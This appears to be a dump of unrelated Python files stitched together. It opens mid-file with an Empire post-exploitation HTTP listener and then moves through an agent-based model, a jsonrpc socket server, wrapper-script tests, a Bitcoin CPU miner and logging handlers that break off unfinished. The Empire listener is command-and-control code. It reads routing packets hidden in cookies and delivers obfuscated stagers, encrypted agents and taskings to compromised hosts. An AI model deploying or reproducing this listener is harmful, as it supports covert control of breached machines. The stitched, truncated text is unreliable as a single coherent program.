return send_from_directory(static_dir, 'welcome.png')
clientIP = request.remote_addr
listenerName = self.options['Name']['Value']
message = "[*] GET request for {}/{} from {}".format(request.host, request_uri, clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
routingPacket = None
cookie = request.headers.get('Cookie')
if cookie and cookie != '':
try:
# see if we can extract the 'routing packet' from the specified cookie location
# NOTE: this can be easily moved to a parameter, another cookie value, etc.
if self.session_cookie in cookie:
listenerName = self.options['Name']['Value']
message = "[*] GET cookie value from {} : {}".format(clientIP, cookie)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
cookieParts = cookie.split(';')
for part in cookieParts:
if part.startswith(self.session_cookie):
base64RoutingPacket = part[part.find('=') + 1:]
# decode the routing packet base64 value in the cookie
routingPacket = base64.b64decode(base64RoutingPacket)
except Exception as e:
routingPacket = None
pass
if routingPacket:
# parse the routing packet and process the results
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, routingPacket, listenerOptions,
clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if isinstance(results, str):
results = results.encode('UTF-8')
if results == b'STAGE0':
# handle_agent_data() signals that the listener should return the stager.ps1 code
# step 2 of negotiation -> return stager.ps1 (stage 1)
listenerName = self.options['Name']['Value']
message = "\n[*] Sending {} stager (stage 1) to {}".format(language, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
stage = self.generate_stager(language=language, listenerOptions=listenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand)
return make_response(stage, 200)
elif results.startswith(b'ERROR:'):
listenerName = self.options['Name']['Value']
message = "[!] Error from agents.handle_agent_data() for {} from {}: {}".format(
request_uri, clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
if b'not in cache' in results:
# signal the client to restage
print(helpers.color("[*] Orphaned agent from %s, signaling restaging" % (clientIP)))
return make_response(self.default_response(), 401)
else:
return make_response(self.default_response(), 200)
else:
# actual taskings
listenerName = self.options['Name']['Value']
message = "[*] Agent from {} retrieved taskings".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(results, 200)
else:
# dispatcher.send("[!] Results are None...", sender='listeners/http')
return make_response(self.default_response(), 200)
else:
return make_response(self.default_response(), 200)
else:
listenerName = self.options['Name']['Value']
message = "[!] {} requested by {} with no routing packet.".format(request_uri, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.route('/<path:request_uri>', methods=['POST'])
def handle_post(request_uri):
"""
Handle an agent POST request.
"""
stagingKey = listenerOptions['StagingKey']['Value']
clientIP = request.remote_addr
requestData = request.get_data()
listenerName = self.options['Name']['Value']
message = "[*] POST request data length from {} : {}".format(clientIP, len(requestData))
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
# the routing packet should be at the front of the binary request.data
# NOTE: this can also go into a cookie/etc.
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, requestData, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if isinstance(results, str):
results = results.encode('UTF-8')
if results:
if results.startswith(b'STAGE2'):
# TODO: document the exact results structure returned
if ':' in clientIP:
clientIP = '[' + str(clientIP) + ']'
sessionID = results.split(b' ')[1].strip().decode('UTF-8')
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
listenerName = self.options['Name']['Value']
message = "[*] Sending agent (stage 2) to {} at {}".format(sessionID, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
hopListenerName = request.headers.get('Hop-Name')
try:
hopListener = helpers.get_listener_options(hopListenerName)
tempListenerOptions = copy.deepcopy(listenerOptions)
tempListenerOptions['Host']['Value'] = hopListener['Host']['Value']
except TypeError:
tempListenerOptions = listenerOptions
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=tempListenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand)
encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
# TODO: wrap ^ in a routing packet?
return make_response(encryptedAgent, 200)
elif results[:10].lower().startswith(b'error') or results[:10].lower().startswith(b'exception'):
listenerName = self.options['Name']['Value']
message = "[!] Error returned for results by {} : {}".format(clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
elif results.startswith(b'VALID'):
listenerName = self.options['Name']['Value']
message = "[*] Valid results returned by {}".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 200)
else:
return make_response(results, 200)
else:
return make_response(self.default_response(), 404)
else:
return make_response(self.default_response(), 404)
try:
certPath = listenerOptions['CertPath']['Value']
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
# support any version of tls
pyversion = sys.version_info
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
cipherlist_tls12 = ["ECDHE-RSA-AES256-GCM-SHA384", "ECDHE-RSA-AES128-GCM-SHA256", "ECDHE-RSA-AES256-SHA384", "AES256-SHA256", "AES128-SHA256"]
cipherlist_tls10 = ["ECDHE-RSA-AES256-SHA"]
selectciph = random.choice(cipherlist_tls12)+':'+random.choice(cipherlist_tls10)
context.set_ciphers(selectciph)
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
except Exception as e:
print(helpers.color("[!] Listener startup on port %s failed: %s " % (port, e)))
listenerName = self.options['Name']['Value']
message = "[!] Listener startup on port {} failed: {}".format(port, e)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
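# Illustrative sketch (not part of Empire's listener API): the HTTPS branch in
# start_server() above builds an ssl.SSLContext, loads empire-chain.pem and
# empire-priv.key from CertPath, restricts the ciphers and hands the context to
# Flask. A minimal equivalent, with a hypothetical cert directory, looks like:
def _tls_context_sketch(self, cert_dir):
    context = ssl.SSLContext(ssl.PROTOCOL_TLS)
    context.load_cert_chain("%s/empire-chain.pem" % cert_dir,
                            "%s/empire-priv.key" % cert_dir)
    context.set_ciphers("ECDHE-RSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-SHA")
    # usage: app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
    return context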
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print(helpers.color("[!] Killing listener '%s'" % (name)))
self.threads[name].kill()
else:
print(helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value'])))
self.threads[self.options['Name']['Value']].kill()
def generate_cookie(self):
"""
Generate Cookie
"""
chars = string.ascii_letters
cookie = helpers.random_string(random.randint(6, 16), charset=chars)
return cookie
|
model.py
|
"""
-*- coding: utf-8 -*-
Python Version: 3.6
Course: GEOG5790M Programming-for-Spatial-Analysts-Advanced-Skills
Author: Annabel Whipp
File name: model.py
"""
# imports
from landscape import Landscape
from agent import Agent
import random
import multiprocessing
class Model :
def task(self, node, number_of_nodes, pipes):
width = 10 # Landscape width
height = 10 # Landscape height
densitylimit = 50 # Density above which agents move.
number_of_agents = 1000
node_number_of_agents = 0
iterations = 100 # Model iterations before stopping
agents = []
# Set up the landscape.
landscape = Landscape()
landscape.width = width
landscape.height = height
pipe_to_zero = None
# Setup agents
if (node != 0):
node_number_of_agents = int(number_of_agents/(number_of_nodes - 1))
if (node == (number_of_nodes - 1)):
node_number_of_agents = int(node_number_of_agents + (number_of_agents % (number_of_nodes - 1)))
pipe_to_zero = pipes[node - 1]
for i in range (node_number_of_agents):
agents.append(Agent())
agents[i].densitylimit = densitylimit
agents[i].landscape = landscape # Agents get a reference to the
# landscape to interrogate for densities.
# They could also get a reference to the
# agent list if agents need to talk,
# but here they don't.
# Allocate agents a start location.
x = int(width/2) # Set to middle for start
y = int(height/2) # Set to middle for start
agents[i].x = x
agents[i].y = y
# Give the landscape a reference to the agent list so it
# can find out where they all are and calculate densities.
landscape.agents = agents
# Print start map
# Run
for time in range(iterations):
# Send out the local densities to node zero
if (node != 0):
landscape.calc_densities()
densities = landscape.getdensities()
pipe_to_zero.send(densities)
else : # if node is node zero
# Get the local densities in to node zero
densities = []
for x in range(width):
for y in range(height):
densities.append(0)
for i in range (len(pipes)):
# Get the local density from each node i.
local_densities = pipes[i].recv()
# Add node i's density surface to the global surface.
for x in range(width):
for y in range(height):
densities[(y*width) + x] = densities[(y*width) + x] + local_densities[(y*width) + x]
# Send out the global densities to the nodes
if (node == 0):
for i in range (len(pipes)):
pipes[i].send(densities)
else:
# Receive the global densities from node zero.
global_densities = pipe_to_zero.recv()
landscape.setdensities(global_densities)
# Move the agents if the density is too high.
for i in range(node_number_of_agents):
agents[i].step()
# Report
if (node == 0) :
print("time = ", time, " -------------------")
landscape.setdensities(densities)
for x in range(width):
for y in range (height):
print(landscape.getdensityat(x,y), end=" ")
print("")
def main(self):
'''
This version is parallelised.
'''
number_of_nodes = multiprocessing.cpu_count()
processes = []
parent_pipes = []
child_pipes = []
# Make the communication pipes.
for i in range(1, number_of_nodes):
parent_conn, child_conn = multiprocessing.Pipe()
parent_pipes.append(parent_conn)
child_pipes.append(child_conn)
# Give node zero one end of the pipes and start it processing.
p0 = multiprocessing.Process(group=None, target=self.task, name=None, args=(0, number_of_nodes, parent_pipes), kwargs={}, daemon=None)
processes.append(p0)
p0.start()
# Give the other nodes the other ends, and start them processing.
for i in range(1, number_of_nodes):
p = multiprocessing.Process(group=None, target=self.task, name=None, args=(i, number_of_nodes, child_pipes), kwargs={}, daemon=None)
processes.append(p)
p.start()
# Wait for all processes to finish before exiting.
for p in processes:
p.join()
if __name__ == "__main__":
Model().main()
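# --- Hedged usage sketch (editorial addition, not part of the original model) ---
# The pattern above gives node zero the parent end of every Pipe and each worker
# node one child end: workers send their local densities up, node zero sums them
# and broadcasts the global surface back. A minimal standalone sketch of that
# round trip with a single worker; the function names are illustrative only.
def _example_worker(pipe_to_zero):
    pipe_to_zero.send([1, 2, 3])              # send local values up to node zero
    print("global:", pipe_to_zero.recv())     # receive the aggregated values back

def _example_node_zero():
    parent_conn, child_conn = multiprocessing.Pipe()
    worker = multiprocessing.Process(target=_example_worker, args=(child_conn,))
    worker.start()
    local = parent_conn.recv()                # gather from the worker
    parent_conn.send([2 * value for value in local])  # send an aggregate back
    worker.join()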
|
socketserver.py
|
"""
Copyright (c) 2006 Jan-Klaas Kollhof
This file is part of jsonrpc.
jsonrpc is free software; you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation; either version 2.1 of the License, or
(at your option) any later version.
This software is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with this software; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""
from jsonrpc import SimpleServiceHandler
import socket
from threading import Thread
class SocketServiceHandler(SimpleServiceHandler):
def __init__(self, socket, service, messageDelimiter=""):
self.socket = socket
SimpleServiceHandler.__init__(self, service, messageDelimiter=messageDelimiter)
def receiveForever(self):
while 1:
try:
data = self.socket.recv(1024)
except:
data = None
if not data:
if self.socket:
self.close()
return
else:
self.handlePartialData(data)
def send(self, data):
self.socket.send(data)
def close(self):
SimpleServiceHandler.close(self)
if self.socket:
try:
self.socket.shutdown(socket.SHUT_RDWR)
self.socket = None
except:
pass
class TCPServiceServer:
def __init__(self, service, ConnectionHandler = SocketServiceHandler, messageDelimiter=""):
self.service = service
self.ConnectionHandler = ConnectionHandler
self.messageDelimiter=messageDelimiter
def serve(self, address):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.bind(address)
self.socket.listen(5)
print "serving", self.socket
while 1:
(conn,addr) = self.socket.accept()
self.acceptConnection(conn)
def acceptConnection(self, conn):
self.handleConnection(conn)
def handleConnection(self, conn):
self.ConnectionHandler(conn, self.service, messageDelimiter=self.messageDelimiter).receiveForever()
class ThreadingMixin:
def acceptConnection(self, conn):
t = Thread(target=self.handleConnection, args=(conn,))
t.setDaemon(True)
t.start()
class ThreadedTCPServiceServer(ThreadingMixin, TCPServiceServer):
pass
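# --- Hedged usage sketch (editorial addition, not part of the original module) ---
# TCPServiceServer exposes a plain "service" object over TCP: each accepted
# connection is wrapped in SocketServiceHandler, which feeds raw socket data into
# SimpleServiceHandler. EchoService and the port below are assumptions made for
# illustration only.
if __name__ == '__main__':
    class EchoService(object):
        def echo(self, message):
            return message

    # One thread per connection; serve() blocks until the process is interrupted.
    ThreadedTCPServiceServer(EchoService()).serve(("", 10000))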
|
tests.py
|
#! /usr/bin/env python3
import http.server
import os
import shutil
import socket
import subprocess
import tempfile
import threading
import unittest
class WrapperScriptTests(unittest.TestCase):
http_port = 8080
default_download_url = "http://localhost:" + str(http_port) + "/test/testapp.jar"
minimum_script_dependencies = [
"/usr/bin/bash",
"/usr/bin/basename",
"/usr/bin/dirname",
"/usr/bin/grep",
"/usr/bin/head",
"/usr/bin/mkdir",
"/usr/bin/mktemp",
"/usr/bin/mv",
"/usr/bin/sed",
]
def setUp(self):
self.start_server()
self.cache_dir = tempfile.mkdtemp()
def tearDown(self):
self.stop_server()
shutil.rmtree(self.cache_dir)
def test_first_run(self):
result = self.run_script(["arg 1", "arg 2"])
output = result.stdout.decode()
self.assertIn("Downloading batect", output)
self.assertIn("BATECT_WRAPPER_SCRIPT_DIR is: {}\n".format(self.get_script_dir()), output)
self.assertIn("BATECT_WRAPPER_CACHE_DIR is: {}\n".format(self.cache_dir), output)
self.assertIn("HOSTNAME is: {}\n".format(socket.gethostname()), output)
self.assertIn("I received 2 arguments.\narg 1\narg 2\n", output)
self.assertEqual(result.returncode, 0)
def test_second_run(self):
first_result = self.run_script(["arg 1", "arg 2"])
first_output = first_result.stdout.decode()
self.assertIn("Downloading batect", first_output)
self.assertIn("BATECT_WRAPPER_SCRIPT_DIR is: {}\n".format(self.get_script_dir()), first_output)
self.assertIn("BATECT_WRAPPER_CACHE_DIR is: {}\n".format(self.cache_dir), first_output)
self.assertIn("HOSTNAME is: {}\n".format(socket.gethostname()), first_output)
self.assertIn("I received 2 arguments.\narg 1\narg 2\n", first_output)
self.assertEqual(first_result.returncode, 0)
second_result = self.run_script(["arg 3", "arg 4"])
second_output = second_result.stdout.decode()
self.assertNotIn("Downloading batect", second_output)
self.assertIn("BATECT_WRAPPER_SCRIPT_DIR is: {}\n".format(self.get_script_dir()), second_output)
self.assertIn("BATECT_WRAPPER_CACHE_DIR is: {}\n".format(self.cache_dir), second_output)
self.assertIn("HOSTNAME is: {}\n".format(socket.gethostname()), second_output)
self.assertIn("I received 2 arguments.\narg 3\narg 4\n", second_output)
self.assertEqual(second_result.returncode, 0)
def test_download_fails(self):
result = self.run_script(["arg 1", "arg 2"], download_url=self.default_download_url + "-does-not-exist")
self.assertIn("Downloading batect", result.stdout.decode())
self.assertIn("404 File not found", result.stdout.decode())
self.assertNotEqual(result.returncode, 0)
def test_download_is_not_quiet(self):
result = self.run_script([], download_url=self.default_download_url, quiet_download="false")
result_output = result.stdout.decode()
self.assertIn("Downloading batect", result_output)
self.assertIn("BATECT_WRAPPER_SCRIPT_DIR is: {}\n".format(self.get_script_dir()), result_output)
self.assertIn("BATECT_WRAPPER_CACHE_DIR is: {}\n".format(self.cache_dir), result_output)
self.assertIn("HOSTNAME is: {}\n".format(socket.gethostname()), result_output)
self.assertIn("#", result_output)
self.assertEqual(result.returncode, 0)
def test_download_is_quiet(self):
result = self.run_script([], download_url=self.default_download_url, quiet_download="true")
result_output = result.stdout.decode()
self.assertIn("Downloading batect", result_output)
self.assertIn("BATECT_WRAPPER_SCRIPT_DIR is: {}\n".format(self.get_script_dir()), result_output)
self.assertIn("BATECT_WRAPPER_CACHE_DIR is: {}\n".format(self.cache_dir), result_output)
self.assertIn("HOSTNAME is: {}\n".format(socket.gethostname()), result_output)
self.assertNotIn("#", result_output)
self.assertEqual(result.returncode, 0)
def test_no_curl(self):
path_dir = self.create_limited_path(self.minimum_script_dependencies)
result = self.run_script([], path=path_dir)
self.assertIn("curl is not installed or not on your PATH. Please install it and try again.", result.stdout.decode())
self.assertNotEqual(result.returncode, 0)
def test_no_java(self):
path_dir = self.create_limited_path(self.minimum_script_dependencies + ["/usr/bin/curl"])
result = self.run_script([], path=path_dir)
self.assertIn("Java is not installed or not on your PATH. Please install it and try again.", result.stdout.decode())
self.assertNotEqual(result.returncode, 0)
def test_unsupported_java(self):
path_dir = self.create_limited_path_for_specific_java_version("7")
result = self.run_script([], path=path_dir)
self.assertIn("The version of Java that is available on your PATH is version 1.7, but version 1.8 or greater is required.\n" +
"If you have a newer version of Java installed, please make sure your PATH is set correctly.", result.stdout.decode())
self.assertNotEqual(result.returncode, 0)
def test_supported_java(self):
for version in ["8", "9", "10", "11"]:
with self.subTest(java_version=version):
path_dir = self.create_limited_path_for_specific_java_version(version)
result = self.run_script([], path=path_dir)
self.assertIn("The Java application has started.", result.stdout.decode())
self.assertEqual(result.returncode, 0)
def test_supported_java_with_tool_options_set(self):
path_dir = self.create_limited_path_for_specific_java_version("8")
result = self.run_script([], path=path_dir, with_java_tool_options="true")
self.assertIn("The Java application has started.", result.stdout.decode())
self.assertEqual(result.returncode, 0)
def test_non_zero_exit(self):
result = self.run_script(["exit-non-zero"])
output = result.stdout.decode()
self.assertIn("The Java application has started.", output)
self.assertNotIn("WARNING: you should never see this", output)
self.assertEqual(result.returncode, 123)
def create_limited_path_for_specific_java_version(self, java_version):
return self.create_limited_path(self.minimum_script_dependencies +
[
"/usr/bin/curl",
"/usr/lib/jvm/java-{}-openjdk-amd64/bin/java".format(java_version),
])
def create_limited_path(self, executables):
path_dir = tempfile.mkdtemp()
self.addCleanup(lambda: shutil.rmtree(path_dir))
for executable in executables:
base_name = os.path.basename(executable)
os.symlink(executable, os.path.join(path_dir, base_name))
return path_dir
def run_script(self, args, download_url=default_download_url, path=os.environ["PATH"], quiet_download=None, with_java_tool_options=None):
env = {
"BATECT_CACHE_DIR": self.cache_dir,
"BATECT_DOWNLOAD_URL": download_url,
"PATH": path
}
if quiet_download is not None:
env["BATECT_QUIET_DOWNLOAD"] = quiet_download
if with_java_tool_options is not None:
env["JAVA_TOOL_OPTIONS"] = "-XX:+UnlockExperimentalVMOptions -XX:+UseCGroupMemoryLimitForHeap"
path = self.get_script_path()
command = [path] + args
return subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=env)
def get_script_dir(self):
return os.path.abspath(os.path.join(os.path.dirname(os.path.realpath(__file__)), "..", "src"))
def get_script_path(self):
return os.path.join(self.get_script_dir(), "template.sh")
def start_server(self):
self.server = http.server.HTTPServer(("", self.http_port), QuietHTTPHandler)
threading.Thread(target=self.server.serve_forever, daemon=True).start()
def stop_server(self):
self.server.shutdown()
self.server.server_close()
class QuietHTTPHandler(http.server.SimpleHTTPRequestHandler):
def log_message(self, format, *args):
pass
if __name__ == '__main__':
unittest.main()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 2334
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
handlers.py
|
# coding: utf-8
from operator import attrgetter
import multiprocessing
import threading
import logging
import sys
import traceback
from getpass import getpass
import smtplib
import email.utils
from email.message import EmailMessage
from logging import StreamHandler, ERROR, LogRecord
from logging.handlers import SMTPHandler, MemoryHandler, RotatingFileHandler
from .config import validate_log_level_int
class BufferingSMTPHandler(MemoryHandler):
def __init__(
self,
capacity,
mailhost,
toaddrs,
subject=None,
flushLevel=ERROR,
*,
credentials=None,
fromaddr=None,
secure=None,
mailport=None,
timeout=5.0
):
flushLevel = validate_log_level_int(flushLevel)
if isinstance(credentials, str):
credentials = (
credentials,
getpass("Please enter a password for {}: ".format(credentials)),
)
if fromaddr is None:
if not isinstance(credentials, (list, tuple)) or len(credentials) != 2:
raise ValueError(
"you must supply either fromaddr or credentials=(uername, password); "
"fromaddr is None but credentials = {}".format(credentials)
)
fromaddr = credentials[0]
if isinstance(toaddrs, str):
toaddrs = [toaddrs]
elif not toaddrs:
raise ValueError(
"you must supply toaddrs, either a single email address or a list thereof"
)
if mailport is not None:
# SMTPHandler uses a tuple for this
mailhost = (mailhost, mailport)
elif not isinstance(mailhost, (list, tuple)) or len(mailhost) != 2:
raise ValueError(
"If mailport is not explicitly passed, mailhost must be a (host, port) tuple; got {}".format(
mailhost
)
)
MemoryHandler.__init__(self, capacity, flushLevel=flushLevel)
SMTPHandler.__init__(
self,
mailhost=mailhost,
fromaddr=fromaddr,
toaddrs=toaddrs,
subject=subject,
credentials=credentials,
secure=secure,
timeout=timeout,
)
def send_mail(self, content, subject=None):
msg = EmailMessage()
msg["From"] = self.fromaddr
msg["To"] = ",".join(self.toaddrs)
subject = subject or self.subject
if subject is not None:
msg["Subject"] = subject
msg["Date"] = email.utils.localtime()
msg.set_content(content)
port = self.mailport or smtplib.SMTP_PORT
smtp = smtplib.SMTP(self.mailhost, port, timeout=self.timeout)
try:
if self.username:
if self.secure is not None:
smtp.ehlo()
smtp.starttls(*self.secure)
smtp.ehlo()
smtp.login(self.username, self.password)
smtp.send_message(msg)
finally:
smtp.quit()
def get_content(self):
return "\n".join(map(self.format, self.buffer))
def get_subject(self):
if self.subject:
return self.subject
top_record = max(self.buffer, key=attrgetter("levelno"))
top_records = [r for r in self.buffer if r.levelno >= top_record.levelno]
names = sorted(set(r.name for r in top_records))
return "{} messages from loggers {}".format(
top_record.levelname, ", ".join(names)
)
def flush(self):
if len(self.buffer) > 0:
content = self.get_content()
subject = self.get_subject()
try:
self.send_mail(content, subject)
except:
self.handleError(
LogRecord(
self.name,
self.level,
pathname=None,
lineno=None,
msg=content,
args=(),
exc_info=sys.exc_info(),
)
) # no particular record
finally:
self.buffer = []
def __del__(self):
self.flush()
class MultiProcHandler(logging.Handler):
"""
Adapted from zzzeek's answer at:
https://stackoverflow.com/questions/641420/how-should-i-log-while-using-multiprocessing-in-python
Tweaked and subclassed here - added the get_subhandler() method for generality.
"""
subhandler_cls = None
def __init__(self, *args, **kwargs):
logging.Handler.__init__(self)
self._handler = self.get_subhandler(*args, **kwargs)
self.queue = multiprocessing.Queue(-1)
t = threading.Thread(target=self.receive, daemon=True)
t.start()
def get_subhandler(self, *args, **kwargs):
return self.subhandler_cls(*args, **kwargs)
def setFormatter(self, fmt):
logging.Handler.setFormatter(self, fmt)
self._handler.setFormatter(fmt)
def receive(self):
while True:
try:
record = self.queue.get()
self._handler.emit(record)
except (KeyboardInterrupt, SystemExit):
raise
except EOFError:
break
except:
traceback.print_exc(file=sys.stderr)
def send(self, s):
self.queue.put_nowait(s)
def _format_record(self, record):
